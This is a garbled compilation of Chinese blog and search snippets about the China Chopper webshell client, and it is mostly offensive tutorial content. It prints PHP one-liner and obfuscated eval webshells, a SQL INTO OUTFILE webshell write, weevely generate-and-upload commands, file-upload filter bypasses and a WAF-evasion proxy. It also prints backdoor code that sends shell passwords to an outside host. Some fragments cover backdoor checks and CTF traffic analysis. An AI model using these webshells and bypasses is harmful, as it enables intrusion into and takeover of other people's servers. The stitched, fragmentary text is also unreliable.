本篇以 中国菜刀 (简称:菜刀)进行讲解。 什么是 “ 菜刀 ” 菜刀本身最简单的结构就是一个二进制文件。...以php脚本写的网站为例,拿站的一句话木马脚本真的就一句话: (这句木马可能会被微信过滤或者删除,在这里同时写了文本和图片(同一个一句话木马)) 说白了,就是php的可执行函数导致传参被执行,Hacker...直接与网站的系统交互 读明白这句话需要学习PHP语言,给大家解析一下这个一句话 :首先,位于最边界的这个字符串这是php的开头结尾 @:php的抑制报错继续执行的符号。...上传点当然要自己找~~) 2.你将一句话上传后,其url则为(路径+文件名):http://127.0.0.1/q.php 那么,你只需要在菜刀中添加一个记录即可 3.输对地址,简本语言,参数名后直接连接即可...由于被拿服务器的php权限配置不当,我们可任意操控被拿网站的盘符。 菜刀操作很容易上手,在这里,菜刀和一句话木马的基础讲解完毕。
类似前言一样得废话 昨天偶然看到了中国菜刀这个词,突然发现这类软件的工作原理倒是没有好好看过,只看过 pwntools的,所以难得有时间,便开着wireshark搞一手,看看发了什么玩意 首先大体分为两种...,一种是读取文件的shell,一种是执行命令的shell 执行命令 菜刀用的方式是这样的 第一个php马->z1[post]->r=z1+z2(拼接语句) ->z2[post]...#z1为/bin/sh #z2为执行所需的命令 在第一个php马中,执行php语句,该Php语句因为过狗的关系,其中所需的值是需要通过二次post来传入的 首先在菜刀中,右键选择虚拟终端...php eval($_POST[-7]);?> 在第一个包中,找到菜刀发送到服务端的包 ?...,而菜刀的做法是,在其中又套了一个一句话木马,参数为 z0 然后它传入了第二个参数,参数为 z0,内容为 @ini_set("display_errors","0");@set_time_limit(0
增加批量挂链功能(只支持asp php)。 支持批量查找可写目录功能(只支持asp php),并在生成内页和批量上传直接调用。...支持批量替换寄生虫功能(只支持asp php),但要注意服务器压力。 使用要点介绍: 批量上传时,请选择“自动选择”模式,全自动化一键所有shell全部上传。
C 是中餐厨师的菜刀,做啥菜就那一把刀,切菜切肉切鱼,都是这一把刀,刀工好的师傅,豆腐都能切成一朵花。
无敌 那么抱着无聊找事干的心态,链接还是不贴出来,有需要的后台回复 python菜刀就有了 这垃圾微信公众平台又不允许原创申明了,字数哪里少了
何为中国菜刀 中国菜刀是在web渗透测试中用于用于连接一句话木马的工具。因简单,实用而被很多人追捧。但是现在网络上存在的版本都存在后门,即所谓的黑吃黑的现象!...php $a = $GLOBALS; $str = '_POST'; eval/**nice**/(''. $a[$str]['bbskali.cn']. NULL); ?
php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.php'; 但是我发现一个问题,上传php后缀直接sql报错。...然后想起来今天老师的服务器根目录下面有一个2.php,点开之后啥都没有,我当时推测是一个php木马。然后我用菜刀试了几个我常用的密码,发现都不对。刚刚看到了那个视频讲了一下如何使用msf破解菜刀密码。...然后点开1.php一片空白。...菜刀 菜刀这个东西我以前刚用的时候不知道用法就瞎搞,相信很多新手刚学的时候也有我一样的问题,就是传上去一个木马,比如我在xx.com.cn/xx/yy/upload.php这里上传了一个木马,然后我开菜刀...然后当时也是不懂就瞎搞,菜刀这个东西必须要找到你上传的木马的路径,就是举个例子xx.com.cn/xx/yy/zz/upload/1.php,然后你开菜刀直接把url输入进去,然后输入木马的密码,就可以了
本次教程来自YanXia,转载请注明作者信息,博客地址http://www.535yx.cn,感谢 0x00 引言 菜刀简介:菜刀不是用来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,...只要支持动态脚本的网站,都可以用中国菜刀来进行管理。 而现在网络上流传着许多菜刀版本,这些菜刀中十有八九都存在着他人的后门,这些后门的投放者则利用这些后门获取源源不断的shell用来做违法的事儿。...应老表们的要求,今天给大家带来一篇简单的查菜刀是否存在后门的教程(本文章仅教授诸位如何查找菜刀后门。...请各位不要看了本文后,反而去做一些坏事) 0x01 工具准备 一个xise菜刀(这个是存在后门的),一个c32acm 链接:https://pan.baidu.com/s/1Q-VmVGZfaAnkJxEqlY0Bbg
weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!...准备环境: kali linux Metasploitables2 首先还是先制作一个 webshell ,密码为 bbskali weevely generate bbskali secist.php...我们使用 cat 命令简单查看下 webshell 的内容: cat /usr/share/weevely/secist.php 现在我将生成的 webshell 远程拷贝到目标机器上: scp /usr.../share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin 或者上传PHP木马 连接一句话木马 weevely http://192.168.30.128.../secist.php secist image.png 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/87.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可
基于HTTP代理中转菜刀过WAF 前言 在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。...思路 如果我们要实现类似冰蝎那种数据加密传输必定要拦截菜刀的发送数据。如何拦截呢?这里就可以想到中间人劫持了。利用中间人拦截了菜刀的传输数据然后进行自定义加密再发送给webshell。这不就成功了吗?...分割线上是菜刀正常的传输,下面是我们要实现的加密传输。在加密算法的选择上我选择了DES算法。 原因如下: 1. PHP 本版兼容性最高,代码量少且简单,不依赖openssl 2....在其他脚本中也是相对较少的代码量和较好的兼容性 实现 基于菜刀20160622版本修改和测试。 利用MitmProxy作为中间人代理,只需要写个插件即可实现。...默认监听是8080 用菜刀直接连接就能开始食用啦 ? Webshell和插件还有其他详情在github。
用菜刀链接 ? 菜刀成功链接 ? 成功拿到shel! 错误集锦 无法上传txt文件 ? 原因:没有写入权限 ? 原因:TCP端口不是80 ?...菜刀出现故障 ? 原因:WEB服务器扩展里没有设置Active Server Pages为允许
尝试2: 在 执行 jar 时加入参数-Djsse.enableSNIExtension=false , 忽略证书菜刀测试失败, burpsuite 测试成功 尝试3: 在 执行 jar 时加入参数
一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。...前面说过这是一款完全基于配置文件的菜刀,主程序只是图形的展示,以及数据的发送,我分开了每一个步骤写入到配置文件里面。可以自定义任何代码,包括更改参数名称,参数内容。...当你只用MAKE的时候确实想不到办法去过WAF的时候, 你可以写一个脚本比如PHP的,但是不是一句话,而是实现正常功能的脚本。...比如这个脚本为1.php,我写一个功能为显示主页的功能,然后提交1.php?action=index, 选择自定义对接,就可以与C刀进行连接了。前提是你的1.php得过WAF。...下载地址 请通过阅读原文获取下载地址 补充下关于JSP脚本,修复了原版本菜刀JSP上传失败的问题。 帮老大打个广告团队各种需求二进制大咖,安卓大咖,IOS大咖,小菜我也好抱抱大腿。
一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下 php: 这里没有放jsp的一句话木马,因为jsp的一句话比较复杂,想看的可以看这篇文章 一句话木马的使用 以php...一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。...我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项” ? 编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑” ? ...然后输入DOS命令:copy 1.jpg+1.php 2.jpg ? 此时产生的2.jpg就是我们要的图片一句话木马 总结 其他类型的一句话木马也是一样的使用方法。
基于HTTP代理中转菜刀过WAF 前言 在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。...思路 如果我们要实现类似冰蝎那种数据加密传输必定要拦截菜刀的发送数据。如何拦截呢?这里就可以想到中间人劫持了。利用中间人拦截了菜刀的传输数据然后进行自定义加密再发送给WebShell。这不就成功了吗?...类似下图 分割线上是菜刀正常的传输,下面是我们要实现的加密传输。在加密算法的选择上我选择了DES算法。 原因如下: 1. PHP 本版兼容性最高,代码量少且简单,不依赖openssl 2....在其他脚本中也是相对较少的代码量和较好的兼容性 实现 基于菜刀20160622版本修改和测试。 利用MitmProxy作为中间人代理,只需要写个插件即可实现。...默认监听是8080 用菜刀直接连接就能开始食用啦 Webshell和插件还有其他详情在Github。
一、前言 昨天参加了一场CTF比赛,做了一道菜刀流量分析的题目,因为之前流量分析这块不是很熟悉,加上实战CTF也比较少走了不少弯路。...二、流量分析 菜刀是常见的连接webshell的工具,连接webshell会有明显的GET或POST请求。所以我们只需要找数据包的HTTP请求就行了。...找到第一个HTTP请求,选择追踪HTTP流,进行分析 我们看到webshell就是/upload/1.php文件,webshell是一个post请求,请求的参数action经过base64位加密,我们把它解密出来看看
例子:Apache扩展名解析漏洞 打开站点,将x.php后缀名修改为x.php.7z,上传x.php.7z, 上传成功,上传成功后使用中国菜刀进行连接 3、PHP CGI解析漏洞 Nginx上的漏洞 例子...=”.php” ),forward l 上传yijuhua.php,上传成功 l 用中国菜刀连接yijuhua.php,查看实验现象 5、绕过MIME文件类型检测 打开站点,打开burpsuit,开启服务器代理...,上传,上传成功后使用中国菜刀进行连接 8、黑名单绕过 例子:IIS黑名单绕过 l 将yijuhua.php后缀名改为yijuhua.PHP(文件重命名就可以),上传到站点,上传成功,用中国菜刀连接yijuhua.PHP...l 将xx.asa上传至站点,上传成功,打开xx.asa所在链接写入一句话木马,用中国菜刀进行连接 例子:Apache黑名单绕过 l 将dama.php后缀名改为dama.phP,上传到站点,上传成功后访问木马所在的链接或使用中国菜刀进行连接...l 上传yijuhua.php时使用burpSuite进行抓包,将yijuhua.php后缀名后面加上空格,或者改成php3、上传到站点,上传成功,使用中国菜刀进行连接 9、白名单绕过 例子:截断目录路径
0x01 菜刀简介 软件名称:中国菜刀(China chopper),中国菜刀,不是原来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。...“http://127.0.0.1/1.php”密码为“x”,如图1所示。...图2设置WSockExpert抓包软件 (3)使用中国菜刀打开webshell 在中国菜刀中打开webshell记录http://127.0.0.1/1.php,如图3所示,可以对webshell所在的计算机上浏览...=php_uname();$R.="({$usr})";print $R;;echo("|<-");die(); ?...'& Pass='.key($_POST));}, 其中 http://www.api.com.de/Api.<em>php</em>?Url='.$_SERVER['HTTP_HOST'].
中国菜刀 ? 中国菜刀和一句话木马想必是大家最熟悉的了,中国菜刀支持asp、php、asp.net和jsp等web编程语言,小巧的中国菜刀还自带了很多实用的功能。 例如虚拟终端 ?...asp一句话木马: php一句话木马: aspx一句话木马: 网上也有很多仿冒中国菜刀的官网发布加了后门的中国菜刀。...在linux下也有很多替代中国菜刀的开源产品,例如中国蚁剑和C刀。 Weevely 在kali linux中,我们用的比较多的就是这款php后门管理工具 weevely了。...不推荐作为持续性攻击的权限维持的选择 webacoo -g -o /root/webacoo.php 生成webacoo.php存放在/root目录下 ?
前言 听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。...原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shell,shell接收后用同样的算法进行解密,执行命令。...客户端 本地127.0.0.1,安装phpstudy transfer.php 服务端 192.168.253.129,安装安全狗 transServ.php <?php $DS = @$/*-*/{"_P"."OST"}['x']; //echo $DS; if (!...http://127.0.0.1/transfer.php 密码:x ?
领取专属 10元无门槛券
手把手带您无忧上云